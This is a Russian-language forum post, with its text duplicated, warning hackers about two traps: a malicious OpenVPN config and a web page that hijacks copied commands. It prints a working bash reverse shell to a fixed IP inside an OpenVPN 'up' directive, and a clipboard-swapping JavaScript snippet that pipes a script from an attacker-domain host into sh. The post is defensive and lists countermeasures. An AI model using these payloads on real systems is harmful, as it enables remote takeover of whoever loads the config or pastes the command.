Привет, форумчане! С Новым годом всех!
В конце прошлого года, до того, как наш Казахстан начали громить и изолировали нас от интернета, наткнулся на интереснейший метод "обмана уязвимых слоев хакерского сообщества" -
Надеюсь все в курсе про то, насколько опасно брать скрипты с github к примеру и запускать их на своих устройствах без предварительного ознакомления.
Если нет, то проясню: после
Вот как пример:
Не хочу заострять внимание на этом пункте, очень многие злоумышленники, особенно при освещении какого-нибудь свежего CVE стараются подсунуть POC с полезной нагрузкой, и десятки тысяч неосведомленных людей страдают, доверяясь именитому источнику и запускают исполняемые файлы без проверки, о чем полный интернет информации.
В этот раз хочу поведать о еще 2-х интересных методах:
1.
В нынешнее время очень многие организации, в том числе публичные, используют free OpenVPN сервисы, как средство обеспечения удаленного доступа, в том числе именитые CTF-площадки как HackTheBox и другие.
В чем же опасность?
Да вот представьте себе, на весеннем марафоне The Standoff 2021, в котором мы по итогу заняли 2-е место - увидели конфиг ovpn, содержащий строки подключения к командному серверу, но в порыве битвы не придали этому значение, посчитав, что указанный в конфиге IP адрес просто принадлежал одной из команд участников. Но затем в перерыве обнаружили команду удаленного доступа при активации конфига и как оказалась, что наш сокомандник слепил такой конфиг и подбросил "пирожок".
Продемонстрирую на примере конфига к HackTheBox:
Сама строка в конфиге выглядит следующим образом:
Самое стремное, что даже после сброса соединения OpenVPN - подключение может быть активным:
Ознакомиться с переводом статьи от 2018 года можете в
Единственный метод уберечься - читать внимательно исполняемые конфиги и скрипты.
Ну или запретить все исходящие порты.
2.
Совершенно недавно, буквально накануне НГ я встретил такой метод обмана -
На веб-странице есть статья с некими командами, копируя которые, Вы даже не подозреваете что происходит подстановка символов и при вставке кода в свой терминал Вы невольно реализуете Reverse Shell или RCE до сервера злоумышленника.
С виду обычный текст
При вставке в терминал получаем RCE
Теперь поясню, как это работает. Ради эксперимента, разместите на своем локальном веб-сервере js скрипт следующего содержания вместе с любым html содержимым, к примеру:
Как мы видим, при копировании элемента текста с текстового поля происходит замена на вызов нашего зловреда с переносом строки, дабы не утруждать нас нажимать клавишу Enter и мы невольно можем стать жертвой.
Скажете Вы - дак это надо совсем олухом быть, чтобы не видеть такого - отвечу - можно все тоже-самое провернуть и с абфускацией исполняемой команды и спрятать это дело в часть скопированного текста, тут все от фантазии зависит.
Вот ролик с демонстрацией
Единственный метод уберечься - вставлять в текстовый редактор или использовать octothorpe или sharp (#) перед вставкой скопированного текста в терминал.
Еще один метод уберечься, в родном терминале последнего Kali - установить значение "Confirm multiple lines" или поискать это значение в используемом Вами терминале
github.com
Будьте бдительны и внимательны!
В конце прошлого года, до того, как наш Казахстан начали громить и изолировали нас от интернета, наткнулся на интереснейший метод "обмана уязвимых слоев хакерского сообщества" -
Ссылка скрыта от гостей
(Script kiddie), о чем попробую сегодня Вам поведать.
Ссылка скрыта от гостей
— крупнейший веб-сервис для хостинга IT-проектов и их совместной разработки. Создатели сайта называют GitHub «социальной сетью для разработчиков». Кроме размещения кода, участники могут общаться, комментировать правки друг друга, а также следить за новостями знакомых.Надеюсь все в курсе про то, насколько опасно брать скрипты с github к примеру и запускать их на своих устройствах без предварительного ознакомления.
Если нет, то проясню: после
Ссылка скрыта от гостей
именитого ресурса github.com корпорацией Microsoft - появилось правило, запрещающее располагать на ресурсе скомпилированные образцы - только исходники, с которых пользователи сами собирают исполняемые файлы, в том числе ввелась
Ссылка скрыта от гостей
проверки исходного кода скриптов перед их использованием.Вот как пример:
Не хочу заострять внимание на этом пункте, очень многие злоумышленники, особенно при освещении какого-нибудь свежего CVE стараются подсунуть POC с полезной нагрузкой, и десятки тысяч неосведомленных людей страдают, доверяясь именитому источнику и запускают исполняемые файлы без проверки, о чем полный интернет информации.
В этот раз хочу поведать о еще 2-х интересных методах:
- OpenVPN Reverse shell
- Copy&Past Injection
1.
В нынешнее время очень многие организации, в том числе публичные, используют free OpenVPN сервисы, как средство обеспечения удаленного доступа, в том числе именитые CTF-площадки как HackTheBox и другие.
В чем же опасность?
Да вот представьте себе, на весеннем марафоне The Standoff 2021, в котором мы по итогу заняли 2-е место - увидели конфиг ovpn, содержащий строки подключения к командному серверу, но в порыве битвы не придали этому значение, посчитав, что указанный в конфиге IP адрес просто принадлежал одной из команд участников. Но затем в перерыве обнаружили команду удаленного доступа при активации конфига и как оказалась, что наш сокомандник слепил такой конфиг и подбросил "пирожок".
Продемонстрирую на примере конфига к HackTheBox:
Сама строка в конфиге выглядит следующим образом:
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”
Самое стремное, что даже после сброса соединения OpenVPN - подключение может быть активным:
Ознакомиться с переводом статьи от 2018 года можете в
Ссылка скрыта от гостей
Единственный метод уберечься - читать внимательно исполняемые конфиги и скрипты.
Ну или запретить все исходящие порты.
2.
Совершенно недавно, буквально накануне НГ я встретил такой метод обмана -
На веб-странице есть статья с некими командами, копируя которые, Вы даже не подозреваете что происходит подстановка символов и при вставке кода в свой терминал Вы невольно реализуете Reverse Shell или RCE до сервера злоумышленника.
С виду обычный текст
При вставке в терминал получаем RCE
Теперь поясню, как это работает. Ради эксперимента, разместите на своем локальном веб-сервере js скрипт следующего содержания вместе с любым html содержимым, к примеру:
Java:
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>Как мы видим, при копировании элемента текста с текстового поля происходит замена на вызов нашего зловреда с переносом строки, дабы не утруждать нас нажимать клавишу Enter и мы невольно можем стать жертвой.
Скажете Вы - дак это надо совсем олухом быть, чтобы не видеть такого - отвечу - можно все тоже-самое провернуть и с абфускацией исполняемой команды и спрятать это дело в часть скопированного текста, тут все от фантазии зависит.
Вот ролик с демонстрацией
Единственный метод уберечься - вставлять в текстовый редактор или использовать octothorpe или sharp (#) перед вставкой скопированного текста в терминал.
Еще один метод уберечься, в родном терминале последнего Kali - установить значение "Confirm multiple lines" или поискать это значение в используемом Вами терминале
I should be able to turn off the "pasting multiple lines" warning. · Issue #7482 · microsoft/terminal
Description of the new feature/enhancement When I paste into the terminal and my copied text includes a newline, I get a warning stating You are about to paste text that contains multiple lines. If...
github.com
Будьте бдительны и внимательны!
Последнее редактирование:
100%
